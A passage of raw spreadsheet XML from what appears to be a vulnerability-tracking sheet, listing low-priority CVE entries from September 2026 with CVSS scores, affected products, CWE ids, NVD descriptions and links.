t="n"><v>0.001</v></c><c r="I1523" s="5" t="inlineStr" /><c r="J1523" s="5" t="inlineStr" /><c r="K1523" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1523" s="5" t="inlineStr" /><c r="M1523" s="5" t="inlineStr" /><c r="N1523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1523" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1523" s="5" t="inlineStr" /><c r="R1523" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1523" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Untrusted Search Path vulnerability that could result in privilege escalation. An attacker with high privileges could leverage this vulnerability to gain elevated access. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80159</t></is></c></row><row r="1524"><c r="A1524" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1524" s="5" t="inlineStr"><is><t>CVE-2026-49895</t></is></c><c r="D1524" s="5" t="n"><v>3.5</v></c><c r="E1524" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1524" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1524" s="5" t="inlineStr" /><c r="H1524" s="5" t="n"><v>0.001</v></c><c r="I1524" s="5" t="inlineStr" /><c r="J1524" s="5" t="inlineStr" /><c r="K1524" s="5" t="inlineStr" /><c r="L1524" s="5" t="inlineStr" /><c r="M1524" s="5" t="inlineStr" /><c r="N1524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1524" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1524" s="5" t="inlineStr" /><c r="R1524" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1524" s="5" t="inlineStr"><is><t>In get_eht_operation_channel_width of ieee802_11_common.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49895</t></is></c></row><row r="1525"><c r="A1525" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1525" s="5" t="inlineStr"><is><t>CVE-2026-69904</t></is></c><c r="D1525" s="5" t="n"><v>3.5</v></c><c r="E1525" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1525" s="5" t="inlineStr" /><c r="H1525" s="5" t="n"><v>0.006</v></c><c r="I1525" s="5" t="inlineStr" /><c r="J1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1525" s="5" t="inlineStr" /><c r="M1525" s="5" t="inlineStr" /><c r="N1525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1525" s="5" t="inlineStr" /><c r="R1525" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1525" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t></is></c></row><row r="1526"><c r="A1526" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1526" s="5" t="inlineStr"><is><t>CVE-2026-75726</t></is></c><c r="D1526" s="5" t="n"><v>3.5</v></c><c r="E1526" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1526" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1526" s="5" t="inlineStr" /><c r="H1526" s="5" t="n"><v>0.004</v></c><c r="I1526" s="5" t="inlineStr" /><c r="J1526" s="5" t="inlineStr" /><c r="K1526" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1526" s="5" t="inlineStr" /><c r="M1526" s="5" t="inlineStr" /><c r="N1526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1526" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1526" s="5" t="inlineStr" /><c r="R1526" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1526" s="5" t="inlineStr"><is><t>Adobe Experience Manager is affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized limited write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page.</t></is></c><c r="T1526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75726</t></is></c></row><row r="1527"><c r="A1527" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1527" s="5" t="inlineStr"><is><t>CVE-2026-76960</t></is></c><c r="D1527" s="5" t="n"><v>3.5</v></c><c r="E1527" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1527" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1527" s="5" t="inlineStr" /><c r="H1527" s="5" t="n"><v>0.001</v></c><c r="I1527" s="5" t="inlineStr" /><c r="J1527" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1527" s="5" t="inlineStr" /><c r="L1527" s="5" t="inlineStr" /><c r="M1527" s="5" t="inlineStr" /><c r="N1527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1527" s="5" t="inlineStr" /><c r="R1527" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1527" s="5" t="inlineStr"><is><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is></c><c r="T1527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t></is></c></row><row r="1528"><c r="A1528" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1528" s="5" t="inlineStr"><is><t>CVE-2026-76961</t></is></c><c r="D1528" s="5" t="n"><v>3.5</v></c><c r="E1528" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1528" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1528" s="5" t="inlineStr" /><c r="H1528" s="5" t="n"><v>0.001</v></c><c r="I1528" s="5" t="inlineStr" /><c r="J1528" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1528" s="5" t="inlineStr" /><c r="L1528" s="5" t="inlineStr" /><c r="M1528" s="5" t="inlineStr" /><c r="N1528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1528" s="5" t="inlineStr" /><c r="R1528" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1528" s="5" t="inlineStr"><is><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is></c><c r="T1528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t></is></c></row><row r="1529"><c r="A1529" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1529" s="5" t="inlineStr"><is><t>CVE-2026-0054</t></is></c><c r="D1529" s="5" t="n"><v>3.3</v></c><c r="E1529" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1529" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1529" s="5" t="inlineStr" /><c r="H1529" s="5" t="n"><v>0.001</v></c><c r="I1529" s="5" t="inlineStr" /><c r="J1529" s="5" t="inlineStr" /><c r="K1529" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1529" s="5" t="inlineStr" /><c r="M1529" s="5" t="inlineStr" /><c r="N1529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1529" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1529" s="5" t="inlineStr" /><c r="R1529" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1529" s="5" t="inlineStr"><is><t>In isCallerAllowed of WalletContextualLocationsService.kt, there is a possible way to get wallet information due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0054</t></is></c></row><row r="1530"><c r="A1530" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1530" s="5" t="inlineStr"><is><t>CVE-2026-28582</t></is></c><c r="D1530" s="5" t="n"><v>3.3</v></c><c r="E1530" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1530" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1530" s="5" t="inlineStr" /><c r="H1530" s="5" t="n"><v>0.001</v></c><c r="I1530" s="5" t="inlineStr" /><c r="J1530" s="5" t="inlineStr" /><c r="K1530" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1530" s="5" t="inlineStr" /><c r="M1530" s="5" t="inlineStr" /><c r="N1530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1530" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1530" s="5" t="inlineStr" /><c r="R1530" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1530" s="5" t="inlineStr"><is><t>In onCreate of ConfirmDeviceCredentialActivity.java, there is a possible unauthorized access to and modification of device credentials due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28582</t></is></c></row><row r="1531"><c r="A1531" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1531" s="5" t="inlineStr"><is><t>CVE-2026-28622</t></is></c><c r="D1531" s="5" t="n"><v>3.3</v></c><c r="E1531" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1531" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1531" s="5" t="inlineStr" /><c r="H1531" s="5" t="n"><v>0.001</v></c><c r="I1531" s="5" t="inlineStr" /><c r="J1531" s="5" t="inlineStr" /><c r="K1531" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1531" s="5" t="inlineStr" /><c r="M1531" s="5" t="inlineStr" /><c r="N1531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1531" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1531" s="5" t="inlineStr" /><c r="R1531" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1531" s="5" t="inlineStr"><is><t>In getQueryBuilderInternal of MediaProvider.java, there is a possible way to retrieve location metadata due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28622</t></is></c></row><row r="1532"><c r="A1532" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1532" s="5" t="inlineStr"><is><t>CVE-2026-28623</t></is></c><c r="D1532" s="5" t="n"><v>3.3</v></c><c r="E1532" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1532" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1532" s="5" t="inlineStr" /><c r="H1532" s="5" t="n"><v>0.001</v></c><c r="I1532" s="5" t="inlineStr" /><c r="J1532" s="5" t="inlineStr" /><c r="K1532" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1532" s="5" t="inlineStr" /><c r="M1532" s="5" t="inlineStr" /><c r="N1532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1532" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1532" s="5" t="inlineStr" /><c r="R1532" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1532" s="5" t="inlineStr"><is><t>In writeToParcel of BleRssiRangingCapabilities.java, there is a possible way to obtain the Bluetooth MAC address due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28623</t></is></c></row><row r="1533"><c r="A1533" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1533" s="5" t="inlineStr"><is><t>CVE-2026-28630</t></is></c><c r="D1533" s="5" t="n"><v>3.3</v></c><c r="E1533" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1533" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1533" s="5" t="inlineStr" /><c r="H1533" s="5" t="n"><v>0.001</v></c><c r="I1533" s="5" t="inlineStr" /><c r="J1533" s="5" t="inlineStr" /><c r="K1533" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1533" s="5" t="inlineStr" /><c r="M1533" s="5" t="inlineStr" /><c r="N1533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1533" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1533" s="5" t="inlineStr" /><c r="R1533" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1533" s="5" t="inlineStr"><is><t>In onCreate of ContactsPickerActivity.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28630</t></is></c></row><row r="1534"><c r="A1534" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1534" s="5" t="inlineStr"><is><t>CVE-2026-28638</t></is></c><c r="D1534" s="5" t="n"><v>3.3</v></c><c r="E1534" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1534" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1534" s="5" t="inlineStr" /><c r="H1534" s="5" t="n"><v>0.001</v></c><c r="I1534" s="5" t="inlineStr" /><c r="J1534" s="5" t="inlineStr" /><c r="K1534" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1534" s="5" t="inlineStr" /><c r="M1534" s="5" t="inlineStr" /><c r="N1534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1534" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1534" s="5" t="inlineStr" /><c r="R1534" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1534" s="5" t="inlineStr"><is><t>In multiple functions of XmpDataParser.java, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28638</t></is></c></row><row r="1535"><c r="A1535" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1535" s="5" t="inlineStr"><is><t>CVE-2026-28660</t></is></c><c r="D1535" s="5" t="n"><v>3.3</v></c><c r="E1535" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1535" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1535" s="5" t="inlineStr" /><c r="H1535" s="5" t="n"><v>0.001</v></c><c r="I1535" s="5" t="inlineStr" /><c r="J1535" s="5" t="inlineStr" /><c r="K1535" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1535" s="5" t="inlineStr" /><c r="M1535" s="5" t="inlineStr" /><c r="N1535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1535" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1535" s="5" t="inlineStr" /><c r="R1535" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1535" s="5" t="inlineStr"><is><t>In getAllSessions of multiple files, there is a possible confused deputy due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28660</t></is></c></row><row r="1536"><c r="A1536" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1536" s="5" t="inlineStr"><is><t>CVE-2026-28671</t></is></c><c r="D1536" s="5" t="n"><v>3.3</v></c><c r="E1536" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1536" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1536" s="5" t="inlineStr" /><c r="H1536" s="5" t="n"><v>0.001</v></c><c r="I1536" s="5" t="inlineStr" /><c r="J1536" s="5" t="inlineStr" /><c r="K1536" s="5" t="inlineStr" /><c r="L1536" s="5" t="inlineStr" /><c r="M1536" s="5" t="inlineStr" /><c r="N1536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1536" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1536" s="5" t="inlineStr" /><c r="R1536" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1536" s="5" t="inlineStr"><is><t>In updateInternal of MediaProvider.java, there is a possible expose contents of files due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28671</t></is></c></row><row r="1537"><c r="A1537" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1537" s="5" t="inlineStr"><is><t>CVE-2026-45519</t></is></c><c r="D1537" s="5" t="n"><v>3.3</v></c><c r="E1537" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1537" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1537" s="5" t="inlineStr" /><c r="H1537" s="5" t="n"><v>0.001</v></c><c r="I1537" s="5" t="inlineStr" /><c r="J1537" s="5" t="inlineStr" /><c r="K1537" s="5" t="inlineStr" /><c r="L1537" s="5" t="inlineStr" /><c r="M1537" s="5" t="inlineStr" /><c r="N1537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1537" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1537" s="5" t="inlineStr" /><c r="R1537" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1537" s="5" t="inlineStr"><is><t>In screenArgsForPermissionCheckIfAny of multiple locations there is a possible risk of unauthorized access due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45519</t></is></c></row><row r="1538"><c r="A1538" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1538" s="5" t="inlineStr"><is><t>CVE-2026-45521</t></is></c><c r="D1538" s="5" t="n"><v>3.3</v></c><c r="E1538" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1538" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1538" s="5" t="inlineStr" /><c r="H1538" s="5" t="n"><v>0.001</v></c><c r="I1538" s="5" t="inlineStr" /><c r="J1538" s="5" t="inlineStr" /><c r="K1538" s="5" t="inlineStr" /><c r="L1538" s="5" t="inlineStr" /><c r="M1538" s="5" t="inlineStr" /><c r="N1538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1538" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1538" s="5" t="inlineStr" /><c r="R1538" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1538" s="5" t="inlineStr"><is><t>In openFile of AppFuseBridge.java, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45521</t></is></c></row><row r="1539"><c r="A1539" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1539" s="5" t="inlineStr"><is><t>CVE-2026-45525</t></is></c><c r="D1539" s="5" t="n"><v>3.3</v></c><c r="E1539" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1539" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1539" s="5" t="inlineStr" /><c r="H1539" s="5" t="n"><v>0.001</v></c><c r="I1539" s="5" t="inlineStr" /><c r="J1539" s="5" t="inlineStr" /><c r="K1539" s="5" t="inlineStr" /><c r="L1539" s="5" t="inlineStr" /><c r="M1539" s="5" t="inlineStr" /><c r="N1539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1539" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1539" s="5" t="inlineStr" /><c r="R1539" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1539" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45525</t></is></c></row><row r="1540"><c r="A1540" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1540" s="5" t="inlineStr"><is><t>CVE-2026-55290</t></is></c><c r="D1540" s="5" t="n"><v>3.3</v></c><c r="E1540" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1540" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1540" s="5" t="inlineStr" /><c r="H1540" s="5" t="n"><v>0.001</v></c><c r="I1540" s="5" t="inlineStr" /><c r="J1540" s="5" t="inlineStr" /><c r="K1540" s="5" t="inlineStr" /><c r="L1540" s="5" t="inlineStr" /><c r="M1540" s="5" t="inlineStr" /><c r="N1540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1540" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1540" s="5" t="inlineStr" /><c r="R1540" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1540" s="5" t="inlineStr"><is><t>In setTo of ResourceTypes.cpp, there is a possible out-of-bounds heap read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55290</t></is></c></row><row r="1541"><c r="A1541" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1541" s="5" t="inlineStr"><is><t>CVE-2026-86564</t></is></c><c r="D1541" s="5" t="n"><v>3.3</v></c><c r="E1541" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1541" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1541" s="5" t="inlineStr" /><c r="H1541" s="5" t="n"><v>0.001</v></c><c r="I1541" s="5" t="inlineStr" /><c r="J1541" s="5" t="inlineStr" /><c r="K1541" s="5" t="inlineStr" /><c r="L1541" s="5" t="inlineStr" /><c r="M1541" s="5" t="inlineStr" /><c r="N1541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1541" s="5" t="inlineStr" /><c r="R1541" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1541" s="5" t="inlineStr"><is><t>A flaw was found in DPDK lib/vhost. Missing length validation before reading command_data in the virtio-net control-queue handler can cause an out-of-bounds read and a host process crash.</t></is></c><c r="T1541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86564</t></is></c></row><row r="1542"><c r="A1542" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1542" s="5" t="inlineStr"><is><t>CVE-2026-28652</t></is></c><c r="D1542" s="5" t="n"><v>3.1</v></c><c r="E1542" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1542" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1542" s="5" t="inlineStr" /><c r="H1542" s="5" t="n"><v>0.002</v></c><c r="I1542" s="5" t="inlineStr" /><c r="J1542" s="5" t="inlineStr" /><c r="K1542" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1542" s="5" t="inlineStr" /><c r="M1542" s="5" t="inlineStr" /><c r="N1542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1542" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1542" s="5" t="inlineStr" /><c r="R1542" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1542" s="5" t="inlineStr"><is><t>In multiple functions of RangingServiceImpl.java, there is a possible MITM due to a missing permission check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28652</t></is></c></row><row r="1543"><c r="A1543" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1543" s="5" t="inlineStr"><is><t>CVE-2026-48707</t></is></c><c r="D1543" s="5" t="n"><v>3.1</v></c><c r="E1543" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1543" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1543" s="5" t="inlineStr" /><c r="H1543" s="5" t="n"><v>0.002</v></c><c r="I1543" s="5" t="inlineStr" /><c r="J1543" s="5" t="inlineStr" /><c r="K1543" s="5" t="inlineStr" /><c r="L1543" s="5" t="inlineStr" /><c r="M1543" s="5" t="inlineStr" /><c r="N1543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1543" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1543" s="5" t="inlineStr" /><c r="R1543" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1543" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Server-Side Request Forgery (SSRF) vulnerability in the file upload functionality (`system/core/uploader.php` at lines 509-532). When the "upload from URL" feature follows an HTTP redirect, the redirected target URL bypasses the private IP address blacklist check. This allows authenticated 